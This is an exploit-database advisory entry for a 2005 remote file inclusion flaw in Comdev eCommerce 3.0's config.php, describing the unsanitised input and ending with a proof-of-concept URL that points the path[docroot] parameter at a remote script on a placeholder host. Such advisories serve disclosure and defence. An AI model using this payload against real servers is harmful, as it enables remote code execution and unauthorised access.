Comdev eCommerce 3.0 - config.php Remote File Inclusion

2005-08-05T00:00:00
ID EXPLOITPACK:5DC3DC1469B4D9FB5A5CADFDA82F6F77
Type exploitpack
Reporter anonymous
Modified 2005-08-05T00:00:00

Description

Comdev eCommerce 3.0 - config.php Remote File Inclusion

                                        
                                            source: https://www.securityfocus.com/bid/14478/info

Comdev eCommerce is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

This issue reportedly affect Comdev eCommerce version 3.0; other versions may also be vulnerable. 

http://www.example.com/oneadmin/config.php?path[docroot]=http://www.example.com/badscript.php.txt